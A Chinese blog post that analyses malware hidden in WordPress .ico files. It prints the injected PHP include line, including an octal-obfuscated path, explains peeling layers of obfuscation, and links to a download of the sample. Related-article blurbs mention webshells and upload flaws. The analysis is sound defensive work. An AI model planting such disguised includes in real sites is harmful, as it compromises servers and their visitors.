如何解决 wordpress 的ico文件挂马的问题,最近被划码的服务器弄的太惨了

最新推荐文章于 2021-03-09 20:26:03 发布
最新推荐文章于 2021-03-09 20:26:03 发布
阅读量495 收藏
点赞数 2
分类专栏: 挂马 文章标签: php wordpress 挂马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qxinfo/article/details/88311640
版权

第一步 获取ico文件,其实就是个php文件

一般是php 文件被加入

<?php @include ".2a35bf57.ico"; 这一行代码 ,这个代码也是被加密的,如下 /*e05a0*/ //@include "\104:/\167ww\057fz\145rp\056ne\164/.\14653\141fa\061d.\151co"; /*e05a0*/ # 第二步 这个ico文件也是加密的,最后一个eval 函数,改为print,运行php文件又出现 被加密的php代码,如下。 修改后的文件如下:![在这里插入图片描述](https://img-blog.csdnimg.cn/2019030716014996.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3F4aW5mbw==,size_16,color_FFFFFF,t_70) 执行后的php代码如下: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190307160356216.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3F4aW5mbw==,size_16,color_FFFFFF,t_70) 很用心的黑客,又把代码加密了一次,另存成php文件后,再继续执行php文件。 # 获取最终的代码如下。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190307160553482.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3F4aW5mbw==,size_16,color_FFFFFF,t_70) 这个代码还算完整,就是被混淆了,基本上能看懂了,绝对是php高手写的代码。 有兴趣的朋友可以来这里分析挂马的程序。 链接:https://pan.baidu.com/s/1zkWEStTt17BwWofXzHDQrg 提取码:7b54 复制这段内容后打开百度网盘手机App,操作更方便哦
山尖美色
关注
专栏目录
网站被黑挂马终极大总结
xysoul的专栏
04-27 1358
1、 简单挂马 首页被挂马,登录网站后,杀毒软件报警,检查后,发现首页index.asp检查,底部出现,清理掉后,页面即正常,这种挂马主要以直接修改首页文件为主,容易发现和清理。 2、 网页后门挂马 登录网站任何页面都出现杀毒报警,按之前的方法查看index.asp,并且去掉了iframe语句。但却发现问题依然存在,于是查看其他文件才发现,所有文件全部加上了挂马语句,即使
WordPress站点被挂马,如何预防、检测和应对?
qq_21750317的博客
06-17 1016
WordPress站点被挂马,如何预防、检测和应对?
删除代码的ico文件
01-30
打开程序会删除恶意代码,包括病毒、木和360安全卫士
我个人所有的独立博客wordpress都被挂马
weixin_30765505的博客
07-08 139
晕,所有的独立博客都中了这个,难怪访问有点慢,今天使用谷歌浏览器 来自知名恶意软件散布者 ***.net 的内容已经插入此网页。现在访问此网页很可能会导致您的计算机受到恶意软件入侵。 恶意软件是一种不怀好意的软件,它会窃取您的身份信息,让您的钱财受损、文件被永久删除等。 解决方法: 登陆 后台或者下载模板去掉 <script type="text/javascript" src...
WordPress在IIS服务器上的伪静态设置方法(解决中文URL无法访问问题
09-28
在IIS服务器上运行WordPress时,可能会遇到一个问题,即中文URL无法正常访问。这是因为IIS服务器不同于Apache服务器,不支持Apache的Mod_Rewrite模块,这使得WordPress的标准Permalinks功能无法启用,导致URL中必须...
win10超多图标.ico文件
10-15
在Windows系统中,.ico文件被广泛用于程序、文件夹、驱动器以及其他系统元素的图标。由于.ico文件包含多个尺寸,因此它们可以在各种屏幕上适当地缩放,不会失真或模糊。 "win10超多图标.ico文件"这个压缩包提供了一...
PS(Photoshop)保存图片为ico格式文件
09-14
不过,通过安装一个名为"ICOFormat"的插件,我们可以轻松解决这个问题。这个插件是一个扩展了Photoshop功能的小程序,允许用户将文件保存为ICO格式。 安装"ICOFormat"插件的步骤如下: 1. 首先,下载并解压压缩包...
node.js中的favicon.ico请求问题处理
10-25
标题和描述中提到的问题是,在使用Node.js开发Web应用程序时,时常会遇到由于浏览器默认行为而发起对favicon.ico文件的请求。这种情况通常会出现在页面加载时,浏览器会自动尝试获取网站的收藏夹图标(Favicon),这...
实例_合并多个尺寸ICO图标到一个图标文件-易语言
06-11
如果需要了解ICO文件头可以参考我之前发的源码: 实例源码 - 文件提取资.源及ICON文件头 https://bbs.125.la/forum.php?mod=viewthreadtid=14590510 你们有没有被困扰百度搜索ICO图标生成 居然都没有找到 一个...
wordpress攻击思路_如何保护您的WordPress网站免受暴力攻击(逐步)
cumohuo9136的博客
09-15 744
wordpress攻击思路Do you want to protect your WordPress site from brute force attacks? These attacks can slow down your website, make it inaccessible, and even crack your passwords to install malware on yo...
MS10-046_LNK文件快捷方式漏洞的原理分析(多图杀猫)
GaA.Ra的自留地 in Csdn
06-10 1万+
文件快捷方式漏洞MS10-046是除了n年前的动画光标(.ani)漏洞之外另一个让我觉得比较有趣的漏洞,毕竟是本机执行任意代码的权限,当然,n年前我还只是一个菜鸟,神都不懂.       入正题吧,欢迎拍砖,大家一起进步.(后面我会把一些参考文章贴出来的)       由于MS10-046的漏洞是在shell32.dll当中,windows出于美化的目的,会现实快捷方式的图标,这个图标可
记一次菜鸡的低级折腾--WordPress get Webshell(后台文件编辑插)
weixin_30908941的博客
03-13 1064
挺简单的一个测试站,开始思路错了,一直去网上找WordPress的漏洞,看有没有什么能利用的,未果,因为这个测试站有些地方并不完善,有的漏洞利用不了,菜鸡的我连弱口令都没猜对,没知识就是这么悲哀。 下面记录一下全过程。。。。 1、wpscan扫描(毫无卵用的步骤) 扫描到主题:twentyseventeen 但是并没有插件: 扫描一下主...
wordpress漏洞上传php文件,WordPress wp-admin/includes/file.php任意文件上传漏洞
weixin_31861847的博客
03-09 582
影响版本:WordPress <= 2.8.5漏洞描述:WordPress是一款免费的论坛Blog系统。WordPress中负责上传文件的代码如下:wp-admin/includes/file.php:---[cut]---line 217:function wp_handle_upload( &$file, $overrides = false, $time = null ) {-...
ico文件失真的解决办法
zjf0836的专栏
03-20 2339
打开Graphics.pas文件,查找函数writeIcon,将以下两句中的16改为65536InternalGetDIBSizes(IconInfo.hbmColor, ColorInfoSize, ColorBitsSize, 16);InternalGetDIB(IconInfo.hbmColor, 0, ColorInfo^, ColorBits^, 16); 保存,重新编
一次被挂马事件的安全分析
weixin_33786077的博客
03-25 768
一、检查系统帐户 这是一台windows server2003的服务器,IIS上建了两个网站。存放在 C:\www 文件夹下的web1和web2文件夹中。(出于安全考虑,文中所有具体信息比如路径、文件名、帐号、口令、IP、MAC等敏感信息有可能在不影响读者理解的前提下做稍许保护性改动) 对于这样一个个人网站来说,恢复其访问倒并不十分紧迫,相对而言,我们更需要先...
favico.ico---网站ico图标设置
七秒一生的专栏
09-22 3436
1. 将成功生成的图标文件下载并改名为favico.ico,上传到网站根目录。 2. 在网站首页的源文件 之间插入下面的斜体部分代码   …… <link rel="icon" href="../favicon.ico" type="image/x-icon" /> 或者     3.动态ico图标的实现方法,先把做好的gif动态图标命
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
PHP在线生成ICO文件代码实现
缩放后的图像会被写入到新的ICO文件中。整个过程完成后,将生成的ICO文件内容输出给客户端,通常是通过HTTP响应头设置为`Content-Type: image/x-icon`并输出文件数据来实现的。 这段代码对于开发者来说,是一个方便...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值